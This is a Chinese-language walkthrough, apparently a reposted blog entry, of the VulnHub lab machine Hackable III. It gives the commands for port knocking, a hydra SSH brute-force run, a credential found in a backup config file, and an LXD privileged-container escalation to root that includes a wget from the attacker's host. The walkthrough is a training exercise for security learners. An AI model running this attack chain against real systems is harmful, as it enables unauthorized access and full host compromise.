Hackable_III

admin 2025年4月2日23:41:10评论13 views字数 1222阅读4分4秒阅读模式

下载地址:https://download.vulnhub.com/hackable/hackable3.ova

攻击者IP:192.168.56.132 nat vmare

受害者IP:192.168.56.147 仅主机 vxbox

参考:https://www.cnblogs.com/upfine/p/17004973.html

端口扫描

22端口关闭

Hackable_III

Hackable_III

目录扫描

Hackable_III

发现密码本

curl http://192.168.56.147/backup/wordlist.txt > pwd.txt

Hackable_III

http://192.168.56.147/config/1.txt 解密 10000

Hackable_III

http://192.168.56.147/css/2.txt

brainfuck解密4444

http://www.hiencode.com/brain.html

Hackable_III

Hackable_III

源代码发现用户名jubiscleudo和邮箱[email protected]

"Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - [email protected]

Hackable_III

源码发现3.jpg

Hackable_III

Hackable_III

解密图片,获得端口65535

Hackable_III

knock 192.168.56.147 10000 4444 65535

使用knock依次敲门,ssh开启

Hackable_III

hydra爆破密码

hydra -l jubiscleudo -P pwd.txt 192.168.56.147 ssh

Hackable_III

发现home存在一个hackable_3的用户

Hackable_III

在/var/www/html/.backup_config.php发现用户名密码

hackable_3/Tr0LLED_3

Hackable_III

lxd提权

id发现有lxd

Hackable_III

下载地址

https://github.com/saghul/lxd-alpine-builder.git

传输文件

wget 192.168.56.132/alpine-v3.19-x86_64-20231214_2106.tar.gz

Hackable_III

获得root权限后,在/mnt/root/root目录下发现root.txt文件,读取该文件成功获取到flag值

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimagelxd init#基本默认配置,进行回车就行lxc init myimage ignite -c security.privileged=truelxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/sh

Hackable_III

Hackable_III

Hackable_III

原文始发于微信公众号(王之暴龙战神):Hackable_III

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月2日23:41:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hackable_IIIhttps://cn-sec.com/archives/3890306.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息